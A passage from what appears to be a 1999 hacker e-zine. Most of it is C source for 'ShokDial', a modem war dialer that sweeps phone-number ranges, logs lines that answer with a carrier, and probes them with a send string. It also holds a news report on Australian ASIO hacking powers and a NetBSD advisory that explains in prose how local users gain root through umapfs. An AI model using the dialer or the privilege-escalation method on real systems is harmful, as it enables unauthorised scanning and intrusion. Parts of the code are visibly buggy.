               BOLDCYAN, ScanMax, NORMAL, BOLDWHITE, NORMAL, PINK, NORMAL,
               BOLDWHITE, NORMAL, PINK, NORMAL);
        exit(ERROR);
      }
    } else putchar('\n');
  } else {
    printf("You must specify \"%sL%s\" for %slocal%s or \"%sD%s\" for %slong distance%s\n",
           PINK, NORMAL, BOLDCYAN, NORMAL, PINK, NORMAL, BOLDCYAN, NORMAL);
    exit(ERROR);
  }
}

/* -------------------------------------------------- */

void open_port()
{
  if (noshow != 1) printf("Opening modem for dialing...\n");

  fd = open(MODEMPORT, O_RDWR | O_NOCTTY);
  if (fd == ERROR) {
    perror("open");
    exit(ERROR);
  }

  noshow = 1; /* We use this function for reopening as well */
}

/* -------------------------------------------------- */

void init_modem()
{
  FILE *logfile;

  if ((logfile = fopen(LogFile, "a")) == NULL) {
    perror("fopen");
    close(fd);
    exit(ERROR);
  }

  printf("Initializing modem (port %s%s%s)....\n", PINK, MODEMPORT, NORMAL);

  /* Hang up modem if it's already on */
  hangup();

  numbytes = write(fd, "+++\r", 4);
  check_for_error(LogFile, fd, numbytes, "write");
  usleep(1000000);

  numbytes = write(fd, "ATZ\r", 4);
  check_for_error(LogFile, fd, numbytes, "write");
  usleep(2000000); /* Use this because we're using SIGALRM which */
                   /* is what sleep() uses. */

  memset(buf, 0, sizeof(buf));
  numbytes = read(fd, buf, sizeof(buf));
  check_for_error(LogFile, fd, numbytes, "read");

  noOK = checkok(LogFile, fd, buf, "initializing modem");
  if (noOK == 1) {
    fclose(logfile);
    close(fd);
    exit(ERROR);
  }

  memset(buf, 0, sizeof(buf));
  fclose(logfile);
}

/* -------------------------------------------------- */

void dial_number()
{
  time_t tm;         /* Where our calendar time is stored */
  FILE *logfile;     /* for the log file */
  char date[32];     /* Contain time scanning started/stopped */
  char phonenum[20]; /* If local: phonenum = First3Digits + ScanMin */
                     /* If long distance: phonenum = */
                     /* First3Digits + Last3Digits + ScanMin */

  if ((logfile = fopen(LogFile, "a")) == NULL) {
    perror("fopen");
    exit(ERROR);
  }

  fprintf(logfile, "\n----------------------\n\n");
  fflush(logfile);

  memset(date, 0, sizeof(date)); /* clear date, not buf, with date's size */
  memset(buf, 0, sizeof(buf));

  tm = time(NULL);
  sprintf(date, "%s", ctime(&tm));
  fprintf(logfile, "Started scanning at/on: %s", date);
  fflush(logfile);
  memset(date, 0, sizeof(date));

  if (daemon == 1) putchar('\n'); /* Just to make it look nicer */

  printf("Using a %s%d%s second connection %stimeout%s.\n",
         BOLDCYAN, TIMEOUT, NORMAL, BOLDWHITE, NORMAL);

  if (toupper(LocalOrLong) == 'L') { /* Local call */
    fprintf(logfile, "Scanning local numbers...\n");
    fprintf(logfile, "Using a %d second connection timeout.\n", TIMEOUT);
    fprintf(logfile, "Starting scanning with %d-%.4d\n\n", First3Digits, ScanMin);
    fflush(logfile);

    while (1) {
      if (rand == 1) ScanMin = (random() % 8889) + 11;

      printf("Dialing %s%d-%.4d%s...\n", PINK, First3Digits, ScanMin, NORMAL);

      memset(phonenum, 0, sizeof(phonenum));
      sprintf(phonenum, "ATDT%d%.4d\r", First3Digits, ScanMin);

      numbytes = write(fd, phonenum, strlen(phonenum));
      check_for_error(LogFile, fd, numbytes, "write");

      memset(buf, 0, sizeof(buf));

      alarm(TIMEOUT); /* How long to wait for timeout */
      sig = 0;

      /*
       * Easier to set it to 1 and then set it
       * to 0 if it's not than vice versa.
       */
      connected = 1;

      do {
        numbytes = read(fd, buf, 511);
        if (sig == 1) break;
      } while ((strstr(buf, "CONNECT")) == NULL);

      alarm(0); /* Turn alarm off if we haven't already. */

      if (connected == 0) noresponse++;
      else if ((strstr(buf, "BUSY")) != NULL) busy++;

      /* Compare the string with "CONNECT" */
      if (connected == 1) { /* Sighandler sets this to 0 when */
                            /* it's called...meaning time out. */
#ifdef BEEP
        putchar('\a');
#endif
        connect++;
        fprintf(logfile, "*** CONNECT *** to %d-%.4d\n", First3Digits, ScanMin);
        printf("%s*** %sCONNECT %s%s*** %s to %s%d-%.4d%s\n",
               BOLDWHITE, BOLDCYAN, NORMAL, BOLDWHITE, NORMAL,
               PINK, First3Digits, ScanMin, NORMAL);

        /* Send a string to the carrier and check for response */
        if (send && listen) { /* send poke string and listen for reply */
          if (write(fd, sendstring, sizeof(sendstring)) == ERROR) {
            perror("write");
            close(fd);
            fclose(logfile);
            exit(ERROR);
          }

          response = 1; /* Sighandler will set this to 0 when it */
                        /* times out */

          printf("response from carrier (after sending string): ");
          fprintf(logfile, "response from carrier (after sending string): ");
          fflush(stdout), fflush(logfile);

          if (read(fd, buf, sizeof(buf)) == ERROR) {
            perror("read");
            printf("continuing anyway...\n");
          }

          if (response == 1) {
            printf("%s\n", buf);
            fprintf(logfile, "%s\n", buf);
          } else {
            printf("timed out while waiting for response\n");
            fprintf(logfile, "timed out while waiting for response\n");
          }
        } else { /* listen = 1, send = 0 */
          response = 1; /* The sighandler will set this to 0 if it */
                        /* times out */

          printf("response from carrier: ");
          fprintf(logfile, "response from carrier: ");

          if (read(fd, buf, sizeof(buf)) == ERROR) {
            perror("read");
            printf("continuing anyway...\n");
          }

          if (response == 1) {
            printf("%s\n", buf);
            fprintf(logfile, "%s\n", buf);
          } else {
            printf("timed out while waiting for response\n");
            fprintf(logfile, "timed out while waiting for response\n");
          }
        }
      }

      memset(buf, 0, sizeof(buf));
      hangup();

      if (rand != 1) {
        /* Increase ScanMin so it scans for the next number */
        ScanMin++;

        if (ScanMin > ScanMax) {
          /* If they are different...then they are scanning */
          /* something like: 555-XXXX through 556-XXXX. */
          /* So now we reset everything. */

          /*
           * If you did: 755-XXXX through 757-XXXX, we need to
           * increase the 755 and repeat until they are the same.
           */
          if (First3Digits != First3Digits1) {
            First3Digits++;
            ScanMin = ScanMin1; /* Restored ScanMin to its */
                                /* original value. */
            continue;
          }

          memset(buf, 0, sizeof(buf));
#ifdef BEEP
          putchar('\a');
#endif
          fprintf(logfile, "\nFinished scanning %d-%.4d through %d-%d.\n",
                  First3Digits, ScanMin1, First3Digits, ScanMax);

          memset(date, 0, sizeof(date));
          tm = time(NULL);
          sprintf(date, "%s", ctime(&tm));
          fprintf(logfile, "Finished at/on: %s", date);
          fflush(logfile);

          printf("Finished scanning %s%d-%.4d %sthrough %s%d-%.4d%s.\n",
                 BOLDCYAN, First3Digits, ScanMin1, NORMAL,
                 BOLDCYAN, First3Digits, ScanMax, NORMAL);

          /* Print statistics. */
          printf("%sResults%s:\n", BOLDRED, NORMAL);
          printf("\t# of %ssuccessful connects%s: %s%d%s\n",
                 BOLDCYAN, NORMAL, PINK, connect, NORMAL);
          printf("\t# of lines %sbusy%s: %s%d%s\n",
                 YELLOW, NORMAL, PINK, busy, NORMAL);
          printf("\t# of %sno responses (timed out)%s: %s%d%s\n",
                 BOLDGREEN, NORMAL, PINK, noresponse, NORMAL);
          printf("Thanks for using %sS%sh%so%sk%sD%si%sa%sl %s%s%s.\n",
                 BLINKCYAN, BOLDGREEN, BOLDBLUE, BOLDPINK, YELLOW, BOLDWHITE,
                 BOLDRED, PINK, BOLDBLUE, VERSION, NORMAL);
          return;
        }
      }

      memset(phonenum, 0, sizeof(phonenum));
    }
  } else { /* (Long Distance call) */
    memset(buf, 0, sizeof(buf));

    fprintf(logfile, "Scanning long distance numbers...\n");
    fprintf(logfile, "Using a %d second connection timeout.\n", TIMEOUT);
    fprintf(logfile, "Started scanning with 1-%.3d-%.3d-%.4d\n\n",
            First3Digits, Last3Digits, ScanMin);
    fflush(logfile);

    while(1) {
      if (rand == 1) ScanMin = (random() % 8889) + 1111;

      printf("Dialing %s1-%.3d-%.3d-%.4d%s...\n",
             PINK, First3Digits, Last3Digits, ScanMin, NORMAL);

      memset(phonenum, 0, sizeof(phonenum));
      sprintf(phonenum, "ATDT1%.3d%.3d%.4d\r",
              First3Digits, Last3Digits, ScanMin);

      numbytes = write(fd, phonenum, strlen(phonenum));
      check_for_error(LogFile, fd, numbytes, "write");

      memset(buf, 0, sizeof(buf));

      alarm(TIMEOUT); /* How long to wait for timeout. */
      sig = 0;

      /*
       * Easier to say it's connected and then
       * set it to 0 if it's not than vice versa.
       */
      connected = 1;

      do {
        numbytes = read(fd, buf, 511);
        if (sig == 1) break;
      } while ((strstr(buf, "CONNECT")) == NULL);

      alarm(0);

      if (connected == 0) noresponse++;
      else if ((strstr(buf, "BUSY")) != NULL) busy++;

      if (connected == 1) { /* The sighandler sets this to 0 when */
                            /* it gets called. */
#ifdef BEEP
        putchar('\a');
#endif
        connect++;
        fprintf(logfile, "*** CONNECT *** to 1-%.3d-%.3d-%.4d\n",
                First3Digits, Last3Digits, ScanMin);
        fflush(logfile);
        printf("%s*** %sCONNECT %s%s*** %sto %s1-%.3d-%.3d-%.4d%s\n",
               BOLDWHITE, BOLDCYAN, NORMAL, BOLDWHITE, NORMAL,
               PINK, First3Digits, Last3Digits, ScanMin, NORMAL);

        /* Send a string to the carrier and check for response */
        if (send && listen) { /* send poke string and listen for reply */
          if (write(fd, sendstring, sizeof(sendstring)) == ERROR) {
            perror("write");
            close(fd);
            fclose(logfile);
            exit(ERROR);
          }

          response = 1; /* The sighandler sets this to 0 if it */
                        /* times out */

          printf("response from carrier (after sending string): ");
          fprintf(logfile, "response from carrier (after sending string): ");
          fflush(stdout), fflush(logfile);

          if (read(fd, buf, sizeof(buf)) == ERROR) {
            perror("read");
            printf("continuing anyway...\n");
          }

          if (response == 1) {
            printf("%s\n", buf);
            fprintf(logfile, "%s\n", buf);
          } else {
            printf("timed out while waiting for response\n");
            fprintf(logfile, "timed out while waiting for response\n");
          }
        } else { /* listen = 1, send = 0 */
          response = 1; /* The sighandler sets this to 0 if it */
                        /* times out. */

          printf("response from carrier: ");
          fprintf(logfile, "response from carrier: ");
          fflush(stdout), fflush(logfile);

          if (read(fd, buf, sizeof(buf)) == ERROR) {
            perror("read");
            printf("continuing anyway...\n");
          }

          if (response == 1) {
            printf("%s\n", buf);
            fprintf(logfile, "%s\n", buf);
          } else {
            printf("timed out while waiting for response\n");
            fprintf(logfile, "timed out while waiting for response\n");
          }
        }
      }

      memset(buf, 0, sizeof(buf));
      hangup();

      if (rand != 1) {
        /* Increase ScanMin so it scans for the next number */
        ScanMin++;

        if (ScanMin > ScanMax) {
          /* If they are different...then they are scanning */
          /* something like: 555-XXXX through 556-XXXX. */
          /* So now we reset everything. */

          /*
           * If you did: 555-755-XXXX through
           * 555-757-XXXX, we need to increase
           * the 755 and repeat until they are the
           * same.
           */
          if ((First3Digits != First3Digits1) || (Last3Digits != Last3Digits1)) {
            if (First3Digits != First3Digits1) First3Digits++;
            if (Last3Digits != Last3Digits1) Last3Digits++;
            ScanMin = ScanMin1; /* Restore to its original value */
            continue;
          }

          memset(buf, 0, sizeof(buf));
#ifdef BEEP
          putchar('\a');
#endif
          fprintf(logfile, "\nFinished scanning 1-%.3d-%.3d-%.4d through 1-%.3d-%.3d-%.4d.\n",
                  First3Digits, Last3Digits, ScanMin1,
                  First3Digits, Last3Digits, ScanMax);

          memset(date, 0, sizeof(date));
          tm = time(NULL);
          sprintf(date, "%s", ctime(&tm));
          fprintf(logfile, "Finished at/on: %s", date);
          fflush(logfile);

          printf("Finished scanning %s1-%.3d-%.3d-%.4d%s through %s1-%.3d-%.3d-%.4d%s",
                 BOLDCYAN, First3Digits, Last3Digits, ScanMin1, NORMAL,
                 BOLDCYAN, First3Digits, Last3Digits, ScanMax, NORMAL);

          /* Print statistics.
*/ printf("%sResults%s:\n", BOLDRED, NORMAL); printf("\t# of %ssuccessful connects%s: %s%d%s\n", BOLDCYAN, NORMAL, PINK, connect, NORMAL); printf("\t# of %sbusy (timed out)%s: %s%d%s\n", YELLOW, NORMAL, PINK, busy, NORMAL); printf("\t# of %sno responses (timed out)%s: %s%d%s\n", BOLDGREEN, NORMAL, PINK, noresponse, NORMAL); printf("Thanks for using %sS%sh%so%sk%sD%si%sa%sl %s%s%s\n", BLINKCYAN, BOLDGREEN, BOLDBLUE, BOLDPINK, YELLOW, BOLDWHITE, BOLDRED, PINK, BOLDBLUE, VERSION, NORMAL); break; } } memset(phonenum, 0, sizeof(phonenum)); } } fclose(logfile); } /* --------------------------------------- */ void confdial(char *confile) { time_t tm; /* Where we our calendar time is stored */ FILE *logfile; /* For the log file */ FILE *confd; /* For the config file */ char date[32]; /* Contain time scanning started/stopped */ char pnum1[20]; /* Phone # without the '-'s and what not. */ char phonenum[20]; /* This will include the ATDT etc. */ if ((logfile = fopen(LogFile, "a")) == NULL) { perror("fopen"); exit(ERROR); } fprintf(logfile, "\n----------------------\n\n"); fflush(logfile); if ((confd = fopen(confile, "r")) == NULL) { perror("fopen"); exit(ERROR); } memset(buf, 0, sizeof(buf)); memset(date, 0, sizeof(date)); tm = time(NULL); sprintf(date, "%s", ctime(&tm)); printf("Reading phone numbers from \"%s%s%s\".\n", PINK, confile, NORMAL); printf("\nNOTE: There is no checking of the phone number for -c or -s\n" "to allow you to enter odd strings such as \"5551234,,,5#\".\n\n"); fprintf(logfile, "Started at/on: %s\n" "Reading phone numbers from config file \"%s\".\n", date, confile); fflush(logfile); memset(date, 0, sizeof(date)); if (daemon == 1) putchar('\n'); /* Just to make it look nicer */ printf("Using a %s%d%s second connection %stimeout%s.\n", BOLDCYAN, TIMEOUT, NORMAL, BOLDWHITE, NORMAL); memset(pnum1, 0, sizeof(pnum1)); memset(phonenum, 0, sizeof(phonenum)); while (!feof(confd)) { if ((fgets(pnum, 512, confd)) == NULL) { perror("fgets"); exit(ERROR); } if 
(pnum[0] == '\n') continue; if ((strstr(pnum, "#")) != NULL) { if (pnum[0] == '#') continue; else { /* Well either there are some spaces, or a */ /* number before the comment */ char *p, *p1; char temp[20]; memset(temp, 0, sizeof(temp)); p = pnum, p1 = temp; while(*p == '\t' || *p == ' ') *p += 1; if (*p == '#') /* Just some space and a comment */ continue; else { /* Okay it's a number */ while(*p != '\t' || *p != ' ' || \ *p != '\n' || *p != '\0' || *p != '#') *p1++ = *p++; sprintf(pnum, "%s", temp); } } } fprintf(logfile, "Dialing %s\n", pnum); fflush(logfile); strip(pnum, pnum1); printf("Dialing %s%s%s\n", BOLDCYAN, pnum, NORMAL); sprintf(phonenum, "ATDT%s\r", pnum1); numbytes = write(fd, phonenum, strlen(phonenum)); check_for_error(LogFile, fd, numbytes, "write"); memset(buf, 0, sizeof(buf)); alarm(TIMEOUT); /* How long to wait for timeout */ sig = 0; connected = 1; /* * Easier to set it to 1 and then set it * to 0 if it's not than vice versa */ do { numbytes = read(fd, buf, 511); if (sig == 1) break; } while ((strstr(buf, "CONNECT")) == NULL); alarm(0); /* Stop the timing. 
*/ /* Compare the string with "CONNECT" */ if (connected == 1) { #ifdef BEEP putchar('\a'); #endif fprintf(logfile, "*** CONNECT *** to %s", pnum); printf("%s*** %sCONNECT %s%s*** %s to %s%s%s\n", BOLDWHITE, BOLDCYAN, NORMAL, BOLDWHITE, NORMAL, PINK, pnum, NORMAL); /* Send a string to the carrier and check for response */ if (send && listen) { /* send poke string and listen for reply */ if (write(fd, sendstring, sizeof(sendstring)) == ERROR) { perror("write"); close(fd); exit(ERROR); } response = 1; /* Sighandler will set this to 0 if it times out */ printf("response from carrier (after sending string): "); fprintf(logfile, "response from carrier (after sending string): "); fflush(stdout), fflush(logfile); if (read(fd, buf, sizeof(buf)) == ERROR) { perror("read"); printf("continuing anyway...\n"); } if (response == 1) { printf("%s\n", buf); fprintf(logfile, "%s\n", buf); } else { printf("timed out while waiting for response\n"); fprintf(logfile, "timed out while waiting for response\n"); } } else { /* listen = 1, send = 0 */ response = 1; /* The sighandler will set this to 0 if it */ /* times out */ printf("response from carrier: "); fprintf(logfile, "response from carrier: "); if (read(fd, buf, sizeof(buf)) == ERROR) { perror("read"); printf("continuing anyway...\n"); } if (response == 1) { printf("%s\n", buf); fprintf(logfile, "%s\n", buf); } else { printf("timed out while waiting for response\n"); fprintf(logfile, "timed out while waiting for response\n"); } } } memset(buf, 0, sizeof(buf)); hangup(); } #ifdef BEEP putchar('\a'); #endif memset(date, 0, sizeof(date)); tm = time(NULL); sprintf(date, "%s", ctime(&tm)); fprintf(logfile, "Finished dialing at/on: %s", date); fflush(logfile); printf("Finished dialing!!\n"); printf("Thanks for using %sS%sh%so%sk%sD%si%sa%sl %s%s%s.\n", BLINKCYAN, BOLDGREEN, BOLDBLUE, BOLDPINK, YELLOW, BOLDWHITE, BOLDRED, PINK, BOLDBLUE, VERSION, NORMAL); fclose(logfile); return; } /* -------------------------------------- */ void 
inputdial() { time_t tm; /* Where we our calendar time is stored */ FILE *logfile; /* For the log file */ char date[32]; /* Contain time scanning started/stopped */ char phonenum[20]; /* This will include the ATDT etc. */ /* Get location of numbers: local numbers or long distance numbers */ LorD: printf("Scanning..\n(%sL%s)ocal, Long (%sD%s)istance: ", PINK, NORMAL, PINK, NORMAL); while(1) { LocalOrLong = getchar(); if (!isprint(LocalOrLong)) continue; if ((toupper(LocalOrLong) != 'L') && (toupper(LocalOrLong) != 'D')) { printf("%sInvalid%s option '%s%c%s'. Enter '%sL%s' or '%sD%s'.\n\n", BOLDRED, NORMAL, BOLDCYAN, LocalOrLong, NORMAL, YELLOW, NORMAL, YELLOW, NORMAL); goto LorD; /* Reprint message. */ } else break; } if ((logfile = fopen(LogFile, "a")) == NULL) { perror("fopen"); exit(ERROR); } fprintf(logfile, "\n----------------------\n\n"); fflush(logfile); memset(buf, 0, sizeof(buf)); memset(date, 0, sizeof(date)); tm = time(NULL); sprintf(date, "%s", ctime(&tm)); fprintf(logfile, "Started at/on: %s\n", date); fprintf(logfile, "Reading phone numbers stdin.\n"); fflush(logfile); memset(date, 0, sizeof(date)); if (daemon == 1) putchar('\n'); /* Just to make it look nicer */ printf("Using a %s%d%s second connection %stimeout%s.\n", BOLDCYAN, TIMEOUT, NORMAL, BOLDWHITE, NORMAL); memset(phonenum, 0, sizeof(phonenum)); printf("When finished, enter \"%s.%s\" as the number.\n", BOLDWHITE, NORMAL); printf("\nNOTE: There is no checking of the phone number for -c or -s\n" "to allow you to enter odd strings such as \"5551234,,,5#\".\n\n"); signal(SIGINT, sighandler); signal(SIGTERM, sighandler); while (1) { if (toupper(LocalOrLong) == 'L') { /* Use local phone numbers */ printf("Enter phone number (i.e. 555-5555): "); scanf("%3d%*c%4d", &First3Digits, &ScanMin); /* First3Digits and ScanMin will both be 0 if "." 
is entered */ if (First3Digits == 0 && ScanMin == 0) goto finished; sprintf(pnum, "%.3d%.4d", First3Digits, ScanMin); fprintf(logfile, "Dialing %.3d-%.4d\n", First3Digits, ScanMin); fflush(logfile); } else { /* LocalOrLong == 'D', use long distance phone numbers */ printf("Enter phone number (i.e. 555-555-5555): "); scanf("%3d%*c%3d%*c%4d", &First3Digits, &Last3Digits, &ScanMin); /* First3Digits and ScanMin will both be 0 if "." is entered */ if (First3Digits == 0 && ScanMin == 0 && Last3Digits == 0) goto finished; sprintf(pnum, "1%.3d%.3d%.4d", First3Digits, Last3Digits, ScanMin); fprintf(logfile, "Dialing %.3d-%.3d-%.4d\n", First3Digits, Last3Digits, ScanMin); fflush(logfile); } sprintf(phonenum, "ATDT%s\r", pnum); numbytes = write(fd, phonenum, strlen(phonenum)); check_for_error(LogFile, fd, numbytes, "write"); memset(buf, 0, sizeof(buf)); alarm(TIMEOUT); /* How long to wait for timeout */ sig = 0; connected = 1; /* * Easier to set it to 1 and then set it * to 0 if it's not than vice versa */ do { numbytes = read(fd, buf, 511); if (sig == 1) break; } while ((strstr(buf, "CONNECT")) == NULL); alarm(0); /* Stop the timing. 
*/ /* Compare the string with "CONNECT" */ if (connected == 1) { #ifdef BEEP putchar('\a'); #endif fprintf(logfile, "*** CONNECT *** to %s", pnum); printf("%s*** %sCONNECT %s%s*** %s to %s%s%s\n", BOLDWHITE, BOLDCYAN, NORMAL, BOLDWHITE, NORMAL, PINK, pnum, NORMAL); if (send && listen) { /* send poke string and listen for reply */ if (write(fd, sendstring, sizeof(sendstring)) == ERROR) { perror("write"); close(fd); exit(ERROR); } response = 1; /* The sighandler returns 0 when it times out */ printf("response from carrier (after sending string): "); fprintf(logfile, "response from carrier (after sending string): "); fflush(stdout), fflush(logfile); if (read(fd, buf, sizeof(buf)) == ERROR) { perror("read"); printf("continuing anyway...\n"); } if (response == 1) { printf("%s\n", buf); fprintf(logfile, "%s\n", buf); } else { printf("timed out while waiting for response\n"); fprintf(logfile, "timed out while waiting for response\n"); } } else { /* listen = 1, send = 0 */ response = 1; /* The sighandler will set this to 0 if it */ /* times out */ printf("response from carrier: "); fprintf(logfile, "response from carrier: "); fflush(stdout), fflush(logfile); if (read(fd, buf, sizeof(buf)) == ERROR) { perror("read"); printf("continuing anyway...\n"); } if (response == 1) { printf("%s\n", buf); fprintf(logfile, "%s\n", buf); } else { printf("timed out while waiting for response\n"); fprintf(logfile, "timed out while waiting for response\n"); } } } memset(buf, 0, sizeof(buf)); hangup(); } finished: memset(date, 0, sizeof(date)); tm = time(NULL); sprintf(date, "%s", ctime(&tm)); fprintf(logfile, "User ended dialing at/on: %s", date); fflush(logfile); printf("Okay I hope you enjoyed it!\n"); printf("Thanks for using %sS%sh%so%sk%sD%si%sa%sl %s%s%s.\n", BLINKCYAN, BOLDGREEN, BOLDBLUE, BOLDPINK, YELLOW, BOLDWHITE, BOLDRED, PINK, BOLDBLUE, VERSION, NORMAL); fclose(logfile); return; } /* -------------------------------------- */ void hangup() { FILE *logfile; if ((logfile = 
fopen(LogFile, "a")) == NULL) { perror("fopen"); exit(ERROR); } /* * The reason we write "ATH" to a nonconnected host is that * this is fine. But when it's connected... +++ is sent as * the login name, and ATH as the password (not a good thing * to be logged on a remote host anyway. ;) * If it is connected we will take the less effecient method * of closing and reopening the fd to hang up */ if (connected != 1) { numbytes = write(fd, "+++\r", 4); check_for_error(LogFile, fd, numbytes, "write"); usleep(500000); memset(buf, 0, sizeof(buf)); numbytes = write(fd, "ATH0\r", 5); check_for_error(LogFile, fd, numbytes, "write"); /* * We're using SIGALRM, and sleep() uses sig alarm * and usleep() doesn't. */ usleep(1000000); numbytes = read(fd, buf, sizeof(buf)); check_for_error(LogFile, fd, numbytes, "read"); usleep(2000000); if (noOK != 1) noOK = checkok(LogFile, fd, buf, "hanging up modem"); else { /* There was an error getting an "OK" from the modem */ fclose(logfile); close(fd), exit(ERROR); } if (noOK == 1) { /* There was an error getting an "OK" from the modem */ fclose(logfile); close(fd), exit(ERROR); } } else { if (close(fd) == ERROR) { perror("close"); exit(ERROR); } open_port(); connected = 0; } memset(buf, 0, sizeof(buf)); fclose(logfile); } /* -------------------------------------- */ /* The reason I have two different sighandler functions, rather than */ /* just basing off the signal number, is simplicity. */ void sighandler(int signum) { FILE *logfile; char date[32]; /* Where the date for the ending time is stored. */ time_t tm; /* Where calendar time is stored. */ memset(date, 0, sizeof(date)); /* Just exit on one of these signals. */ signal(SIGINT, stopnow); signal(SIGTERM, stopnow); tm = time(NULL); sprintf(date, "%s", ctime(&tm)); if ((logfile = fopen(LogFile, "a")) == NULL) { perror("fopen"); exit(ERROR); } printf("%sReceived signal to quit%s:\nClosing up modem, logging, and exitting.\n", BOLDRED, NORMAL); fprintf(logfile, "\nReceived signal to quit. 
Aborting.\n"); fflush(logfile); if (conf == 1) { fprintf(logfile, "Last number dialed was %s", pnum); close(fd); fclose(logfile); exit(ERROR); } if (toupper(LocalOrLong) == 'L') { /* Use local phone numbers */ if (rand != 1 || conf != 1) { fprintf(logfile, "Last number dialed was %.3d-%.4d.\n", First3Digits, ScanMin); printf("Last number dialed was %s%.3d-%.4d%s.\n", BOLDCYAN, First3Digits, ScanMin, NORMAL); } fprintf(logfile, "Results:\n"); fprintf(logfile, "\t# of successful connects: %d\n", connect); fprintf(logfile, "\t# of busy numbers: %d\n", busy); fprintf(logfile, "\t# of no responses (timed out): %d\n", noresponse); } else { /* if LocalOrLong == 'D' */ if (rand != 1 || conf != 1) { fprintf(logfile, "Last number dialed was 1-%.3d-%.3d-%.4d.\n", First3Digits, Last3Digits, ScanMin); printf("Last number dialed was %s1-%.3d-%.3d-%.4d%s.\n", BOLDCYAN, First3Digits, Last3Digits, ScanMin, NORMAL); } fprintf(logfile, "Results:\n"); fprintf(logfile, "\t# of successful connects: %d\n", connect); fprintf(logfile, "\t# of busy numbers: %d\n", busy); fprintf(logfile, "\t# of no responses (timed out): %d\n", noresponse); } /* Print statistics. */ printf("%sResults%s:\n", BOLDRED, NORMAL); printf("\t# of %ssuccessful connects%s: %s%d%s\n", BOLDCYAN, NORMAL, PINK, connect, NORMAL); printf("\t# of %sno responses (timed out)%s: %s%d%s\n", YELLOW, NORMAL, PINK, busy, NORMAL); printf("\t# of %sno responses (timed out)%s: %s%d%s\n", BOLDGREEN, NORMAL, PINK, noresponse, NORMAL); fprintf(logfile, "Aborted at: %s", date); fflush(logfile); noshow = 1; /* So we don't get 'Opening modem for dialing' because */ /* we use open_port() for both hanging up and dialing. 
*/
    hangup();
    close(fd);
    fclose(logfile);
    exit(0);
}

/* -------------------------------------- */

void sighandler1(int signum)
{
    signal(SIGALRM, sighandler1);
    sig = 1;
    response = 0;
    connected = 0;
}

/* -------------------------------------- */

void menu(int signum)
{
    char ch;

    signal(SIGINT, sighandler);
    signal(SIGTERM, sighandler);

    printf("\n\n1. Hang up modem and skip to next number\n");
    printf("2. Hang up modem and exit\n\n");
    printf("Enter 1 or 2: ");

    while (1) {
        fflush(stdout);
        ch = getchar();

        if (ch == '1') {
            alarm(0);  /* Stop the timeout timer. */

            /* Just act like the number timed out. sighandler1 is */
            /* the sig handler called when a number times out.    */
            sighandler1(0);

            /* Reset signal handlers. */
            signal(SIGINT, menu);
            signal(SIGTERM, menu);
            break;
        } else if (ch == '2') {
            /* Sig handler used to exit. So we will just call this. */
            sighandler(0);
        } else if (isprint(ch))
            printf("Invalid option.\nEnter 1 or 2: ");
    }
}

void stopnow(int signum)
{
    /* Exit immediately. */
    exit(ERROR);
}


20.0 Australia gears up security for olympics
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Australia Proposes Intelligence Service Hacking Powers

CANBERRA, AUSTRALIA, 1999 MAR 25 (Newsbytes) -- By Adam Creed, Newsbytes.

Australia's internal security service ASIO (Australian security intelligence organization) is set to get increased powers to hack into computers, copy files and alter software on computers in Australia as it conducts the country's largest ever intelligence operation in the run up to the Sydney 2000 Olympics.

Federal Attorney-General Daryl Williams Thursday introduced into the House of Representatives the first amendments to the ASIO Act in 20 years. The amendments, if passed by Parliament would give the intelligence-gathering service the freedom to access information on the computers and networks of Australian companies and individuals.
Williams claimed the amendments were not in response to the security challenges posed by one event, the Olympics, but through a need to have free access to new sources of intelligence in the information age.

The ASIO Legislation Amendment Bill 1999 will permit security officers to hack into a computer if "there are reasonable grounds for believing that access to data held in a particular computer (the target computer) will substantially assist the collection of intelligence that is important in relation to security."

An access warrant permits ASIO to use computers, phone companies and telecommunications equipment to gain access to a remote or networked computer. Once in, the ASIO hackers will be allowed to copy, add, delete or alter any data in the target computer that is relevant to the security matter.

When they leave, security officers will be allowed to cover up the fact that they hacked into the system and will not be subject to the Crimes Act which forbids computer hacking in Australia.

Although Williams asserts the expanded powers are not in preparation for the 2000 Olympics solely, the role of ASIO during the Olympics has been discussed for over a year.

A 1998 Australian National Audit Office (ANAO) report assessing the adequacy of planned responsibilities and preparations for security during the Olympic games speaks of the new challenges faced by ASIO as it draws on new sources of information both domestically and overseas.

"The Olympics represent a task well beyond the normal scope of intelligence activities, particularly as it will extend to areas outside the usual focus for Australia's security interests," read the report, describing how organizational structures for Olympic intelligence operations closely mirrored the arrangements for "coordinating threat assessments and activities related to terrorism."

During the Olympics ASIO will be expected to collect and disseminate intelligence information.
Interestingly, at the time of the report, the use of the Internet for intelligence-gathering and monitoring in conjunction with intelligence from overseas allies (the US and UK) was also discussed.

"Access to open source material, e.g., Internet and media, may also be used to supplement other material," said the report, talking about online monitoring, search engine use and filters. It went on to note problems with this approach caused by the huge amount of resources needed and the potential for disinformation.

The Australian Security Intelligence Organisation Legislation Amendment Bill 1999 can be found on the World Wide Web at http://www.aph.gov.au/parlinfo/billsnet/bills.htm , and the ANAO audit of Olympic security preparations is in PDF format at http://www.anao.gov.au/rptsfull_99/audrpt5/rpt5-99.pdf .

Reported By Newsbytes News Network, http://www.newsbytes.com

@HWA


21.0 NetBSD security advisories: umapfs and noexec mount flag
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

NetBSD Security Advisory 1999-006
=================================

Topic:    Security hole in umapfs
Version:  NetBSD 1.3.3 and prior; NetBSD-current until 19990312
Severity: Local users can gain root privileges

Abstract
========

Insufficient kernel checking in the umapfs virtual file system allows local users to remap their user id to any other user including the root user.

umapfs is enabled in the default (GENERIC) kernel for the following ports: amiga, arm32, atari, bebox, i386, mac68k, macppc, newsmips, next68k, next68k, ofppc, pmax, sparc, sparc64, vax, x68k. The alpha, hp300, mvme68k, pc532 and sun3 ports do not include umapfs by default.

Technical Details
=================

umapfs creates a null layer, duplicating a sub-tree of the file system name space under another part of the global file system, with uid/gid remapping. The uid and gid mappings are described in two files supplied by the user to mount_umap(8).
When a umapfs mount is attempted, no additional checks are done in the kernel other than the usual checks: the user must be root, or have read access of the target and be owner of the mount point. The only permission checks made were erroneously placed in the mount_umap(8) command. A malicious user can compile their own mount_umap binary that does not include these checks.

With this modified mount_umap a user can mount any directory on another directory they have write access to with their uid mapped to 0. They will then be able to create and modify root owned files in the source directory, including the ability to create setuid root binaries.

Solution and Workarounds
=========================

A patch is available for the NetBSD 1.3.3 which restricts umapfs mounts to root and fixes the above problem. You may find this patch on the NetBSD ftp server:

